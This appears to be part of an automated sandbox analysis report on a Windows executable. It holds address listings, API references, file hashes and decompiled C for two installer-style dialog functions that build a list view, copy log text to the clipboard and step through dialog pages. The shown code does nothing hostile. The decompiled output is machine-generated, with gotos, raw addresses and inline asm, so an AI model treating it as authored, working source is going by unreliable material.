                                                                    0x00405150
                                                                    0x00405152
                                                                    0x00405152
                                                                    0x0040515a
                                                                    0x0040519b
                                                                    0x0040519d
                                                                    0x004051ad
                                                                    0x004051b0
                                                                    0x004051b5
                                                                    0x004051bc
                                                                    0x004051bf
                                                                    0x00405261
                                                                    0x00405269
                                                                    0x00405271
                                                                    0x00405271
                                                                    0x00405277
                                                                    0x0040527f
                                                                    0x00405290
                                                                    0x00405290
                                                                    0x00000000
                                                                    0x0040527f
                                                                    0x004051c5
                                                                    0x004051c8
                                                                    0x004051ce
                                                                    0x004051d3
                                                                    0x004051d5
                                                                    0x004051d7
                                                                    0x004051dd
                                                                    0x004051e4
                                                                    0x004051e9
                                                                    0x004051f0
                                                                    0x004051f3
                                                                    0x004051f3
                                                                    0x004051fa
                                                                    0x00405206
                                                                    0x0040520a
                                                                    0x0040520c
                                                                    0x0040520c
                                                                    0x004051fc
                                                                    0x004051fe
                                                                    0x004051fe
                                                                    0x0040522c
                                                                    0x00405238
                                                                    0x00405247
                                                                    0x00405247
                                                                    0x00405249
                                                                    0x0040524c
                                                                    0x00405255
                                                                    0x00000000
                                                                    0x0040515c
                                                                    0x00405167
                                                                    0x0040516a
                                                                    0x0040516f
                                                                    0x00405171
                                                                    0x00405175
                                                                    0x00405185
                                                                    0x0040518f
                                                                    0x00405191
                                                                    0x00405194
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405177
                                                                    0x00405177
                                                                    0x0040517d
                                                                    0x0040517f
                                                                    0x0040517f
                                                                    0x00405180
                                                                    0x00405181
                                                                    0x00000000
                                                                    0x00405177
                                                                    0x0040515a
                                                                    0x00405135
                                                                    0x00405078
                                                                    0x00000000
                                                                    0x0040508e
                                                                    0x00405098
                                                                    0x0040509d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004050af
                                                                    0x004050b4
                                                                    0x004050c0
                                                                    0x004050c0
                                                                    0x004050c2
                                                                    0x004050d1
                                                                    0x004050d3
                                                                    0x004050d7
                                                                    0x004050da
                                                                    0x00000000
                                                                    0x004050da
                                                                    0x00405078
                                                                    0x00404d2c
                                                                    0x00404d2f
                                                                    0x00404d32
                                                                    0x00404d42
                                                                    0x00404d55
                                                                    0x00404d60
                                                                    0x00404d66
                                                                    0x00404d74
                                                                    0x00404d87
                                                                    0x00404d8c
                                                                    0x00404d97
                                                                    0x00404da0
                                                                    0x00404db6
                                                                    0x00404dc6
                                                                    0x00404dd2
                                                                    0x00404dd2
                                                                    0x00404dd7
                                                                    0x00404ddd
                                                                    0x00404ddf
                                                                    0x00404de2
                                                                    0x00404de7
                                                                    0x00404dec
                                                                    0x00404dee
                                                                    0x00404dee
                                                                    0x00404e0e
                                                                    0x00404e0e
                                                                    0x00404e10
                                                                    0x00404e11
                                                                    0x00404e16
                                                                    0x00404e1c
                                                                    0x00404e20
                                                                    0x00404e25
                                                                    0x00404e2d
                                                                    0x00404e31
                                                                    0x00404e36
                                                                    0x00404e3b
                                                                    0x00404e43
                                                                    0x00404e46
                                                                    0x00404f15
                                                                    0x00404f28
                                                                    0x00000000
                                                                    0x00404e4c
                                                                    0x00404e4f
                                                                    0x00404e52
                                                                    0x00404e55
                                                                    0x00404e55
                                                                    0x00404e5a
                                                                    0x00404e63
                                                                    0x00404e66
                                                                    0x00404e6a
                                                                    0x00404e6d
                                                                    0x00404e70
                                                                    0x00404e79
                                                                    0x00404e82
                                                                    0x00404e85
                                                                    0x00404e88
                                                                    0x00404e8b
                                                                    0x00404ec9
                                                                    0x00404ef4
                                                                    0x00404ecb
                                                                    0x00404eda
                                                                    0x00404eda
                                                                    0x00404e8d
                                                                    0x00404e90
                                                                    0x00404e9e
                                                                    0x00404ea8
                                                                    0x00404eb0
                                                                    0x00404eb7
                                                                    0x00404ec2
                                                                    0x00404ec2
                                                                    0x00404e8b
                                                                    0x00404efa
                                                                    0x00404efb
                                                                    0x00404f07
                                                                    0x00404f07
                                                                    0x00404f13
                                                                    0x00404f2e
                                                                    0x00404f31
                                                                    0x00404f4e
                                                                    0x00000000
                                                                    0x00404f33
                                                                    0x00404f38
                                                                    0x00404f41
                                                                    0x004052d3
                                                                    0x004052e5
                                                                    0x004052e5
                                                                    0x00404f31
                                                                    0x00000000
                                                                    0x00404f13
                                                                    0x00404e46

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00404CED
                                                                    • GetDlgItem.USER32 ref: 00404CFA
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                    • LoadImageA.USER32 ref: 00404D60
                                                                    • SetWindowLongA.USER32(?,000000FC,004052E8), ref: 00404D7A
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                    • SendMessageA.USER32 ref: 00404DB6
                                                                    • SendMessageA.USER32 ref: 00404DC2
                                                                    • SendMessageA.USER32 ref: 00404DD2
                                                                    • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                    • SendMessageA.USER32 ref: 00404E02
                                                                    • SendMessageA.USER32 ref: 00404E0E
                                                                    • SendMessageA.USER32 ref: 00404EA8
                                                                    • SendMessageA.USER32 ref: 00404ED8
                                                                      • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
                                                                    • SendMessageA.USER32 ref: 00404EEC
                                                                    • GetWindowLongA.USER32 ref: 00404F1A
                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F28
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                    • SendMessageA.USER32 ref: 00405033
                                                                    • SendMessageA.USER32 ref: 00405098
                                                                    • SendMessageA.USER32 ref: 004050AD
                                                                    • SendMessageA.USER32 ref: 004050D1
                                                                    • SendMessageA.USER32 ref: 004050F1
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                    • GlobalFree.KERNEL32 ref: 00405116
                                                                    • SendMessageA.USER32 ref: 0040518F
                                                                    • SendMessageA.USER32 ref: 00405238
                                                                    • SendMessageA.USER32 ref: 00405247
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                    • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                    • GetDlgItem.USER32 ref: 004052CA
                                                                    • ShowWindow.USER32(00000000), ref: 004052D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                    • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                    • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                    • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                    0x004054b8
                                                                    0x004054c0
                                                                    0x004054c3
                                                                    0x004054cb
                                                                    0x004054ce
                                                                    0x0040565d
                                                                    0x00405663
                                                                    0x00405687
                                                                    0x00405687
                                                                    0x00405693
                                                                    0x00405699
                                                                    0x004056bb
                                                                    0x004056bb
                                                                    0x004056c1
                                                                    0x00405716
                                                                    0x00405716
                                                                    0x00405719
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040571b
                                                                    0x0040571e
                                                                    0x00405721
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040572b
                                                                    0x00405731
                                                                    0x00405733
                                                                    0x00405736
                                                                    0x00405833
                                                                    0x00000000
                                                                    0x00405833
                                                                    0x00405745
                                                                    0x00405751
                                                                    0x0040575a
                                                                    0x00405761
                                                                    0x00405765
                                                                    0x00405768
                                                                    0x00405771
                                                                    0x00405777
                                                                    0x0040577a
                                                                    0x0040577a
                                                                    0x0040578a
                                                                    0x00405790
                                                                    0x00405793
                                                                    0x0040579e
                                                                    0x0040579e
                                                                    0x0040579f
                                                                    0x004057a2
                                                                    0x004057a9
                                                                    0x004057b0
                                                                    0x004057b8
                                                                    0x004057b8
                                                                    0x004057c6
                                                                    0x004057cc
                                                                    0x004057cf
                                                                    0x004057cf
                                                                    0x004057d6
                                                                    0x004057dc
                                                                    0x004057e5
                                                                    0x004057ec
                                                                    0x004057f5
                                                                    0x004057f7
                                                                    0x004057fa
                                                                    0x00405809
                                                                    0x0040580b
                                                                    0x0040580e
                                                                    0x0040580f
                                                                    0x00405812
                                                                    0x00405813
                                                                    0x00405814
                                                                    0x00405814
                                                                    0x0040581c
                                                                    0x00405827
                                                                    0x0040582d
                                                                    0x0040582d
                                                                    0x00000000
                                                                    0x00405793
                                                                    0x004056c3
                                                                    0x004056c9
                                                                    0x004056f7
                                                                    0x004056f9
                                                                    0x004056ff
                                                                    0x0040570a
                                                                    0x0040570a
                                                                    0x00405711
                                                                    0x00000000
                                                                    0x00405711
                                                                    0x004056cd
                                                                    0x004056d7
                                                                    0x00000000
                                                                    0x0040569b
                                                                    0x0040569b
                                                                    0x004056a1
                                                                    0x004056dc
                                                                    0x00000000
                                                                    0x004056e3
                                                                    0x004056aa
                                                                    0x004056b1
                                                                    0x004056b6
                                                                    0x00000000
                                                                    0x004056b6
                                                                    0x00405699
                                                                    0x004054d4
                                                                    0x004054d8
                                                                    0x004054e0
                                                                    0x004054e4
                                                                    0x004054e7
                                                                    0x004054ea
                                                                    0x004054ed
                                                                    0x004054f0
                                                                    0x004054f1
                                                                    0x004054f2
                                                                    0x0040550b
                                                                    0x0040550e
                                                                    0x00405518
                                                                    0x00405527
                                                                    0x0040552f
                                                                    0x00405537
                                                                    0x0040553c
                                                                    0x0040553f
                                                                    0x0040554b
                                                                    0x00405554
                                                                    0x0040555d
                                                                    0x0040557f
                                                                    0x00405585
                                                                    0x00405596
                                                                    0x0040559b
                                                                    0x004055a9
                                                                    0x004055b7
                                                                    0x004055b7
                                                                    0x004055bc
                                                                    0x004055ca
                                                                    0x004055ca
                                                                    0x004055cf
                                                                    0x004055d2
                                                                    0x004055d7
                                                                    0x004055e3
                                                                    0x004055ec
                                                                    0x004055f9
                                                                    0x00405608
                                                                    0x004055fb
                                                                    0x00405600
                                                                    0x00405600
                                                                    0x00405614
                                                                    0x00405614
                                                                    0x00405628
                                                                    0x00405631
                                                                    0x0040563a
                                                                    0x0040564a
                                                                    0x00405656
                                                                    0x00405656
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID:
                                                                    • API String ID: 590372296-0
                                                                    • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                    • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                    • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                    • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                    0x00403e06
                                                                    0x00403e0f
                                                                    0x00403f50
                                                                    0x00403f54
                                                                    0x00403f58
                                                                    0x00403f5a
                                                                    0x00403f5f
                                                                    0x00403f6a
                                                                    0x00403f75
                                                                    0x00403f7a
                                                                    0x00403f7c
                                                                    0x00403f7e
                                                                    0x00403f81
                                                                    0x00403f86
                                                                    0x00403f94
                                                                    0x00403fa1
                                                                    0x00403fa8
                                                                    0x00403fa8
                                                                    0x00403fa9
                                                                    0x00403fa9
                                                                    0x00403fae
                                                                    0x00403fb4
                                                                    0x00403fbb
                                                                    0x00403fc1
                                                                    0x00403fc3
                                                                    0x00404003
                                                                    0x00404008
                                                                    0x0040400d
                                                                    0x0040400d
                                                                    0x00404012
                                                                    0x0040401b
                                                                    0x0040401d
                                                                    0x00404022
                                                                    0x00404028
                                                                    0x0040402c
                                                                    0x0040402c
                                                                    0x00404031
                                                                    0x00404037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404042
                                                                    0x00404048
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404051
                                                                    0x00404059
                                                                    0x0040405e
                                                                    0x00404061
                                                                    0x00404067
                                                                    0x0040406c
                                                                    0x0040406f
                                                                    0x00404075
                                                                    0x0040407a
                                                                    0x0040407d
                                                                    0x00404083
                                                                    0x0040408b
                                                                    0x00404091
                                                                    0x00404097
                                                                    0x0040409b
                                                                    0x004040a2
                                                                    0x004040a2
                                                                    0x004040a2
                                                                    0x004040ac
                                                                    0x004040be
                                                                    0x004040ca
                                                                    0x004040cf
                                                                    0x004040d9
                                                                    0x004040df
                                                                    0x004040e1
                                                                    0x004040e6
                                                                    0x004040e3
                                                                    0x004040e3
                                                                    0x004040e3
                                                                    0x004040f6
                                                                    0x0040410e
                                                                    0x00404110
                                                                    0x00404116
                                                                    0x0040412b
                                                                    0x00404118
                                                                    0x00404121
                                                                    0x00404123
                                                                    0x00404123
                                                                    0x00404131
                                                                    0x00404142
                                                                    0x00404153
                                                                    0x0040415a
                                                                    0x00404160
                                                                    0x00404164
                                                                    0x00404169
                                                                    0x0040416b
                                                                    0x00000000
                                                                    0x00404171
                                                                    0x00404171
                                                                    0x00404173
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404179
                                                                    0x0040417d
                                                                    0x004041a2
                                                                    0x004041a8
                                                                    0x004041ae
                                                                    0x004041b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004041d6
                                                                    0x004041dc
                                                                    0x004041de
                                                                    0x004041e3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004041e9
                                                                    0x004041ec
                                                                    0x004041ef
                                                                    0x00404206
                                                                    0x00404212
                                                                    0x0040422b
                                                                    0x00404231
                                                                    0x00404235
                                                                    0x0040423a
                                                                    0x00404240
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040424a
                                                                    0x00404255
                                                                    0x00000000
                                                                    0x00404255
                                                                    0x0040417f
                                                                    0x00404185
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040418b
                                                                    0x00404191
                                                                    0x00000000
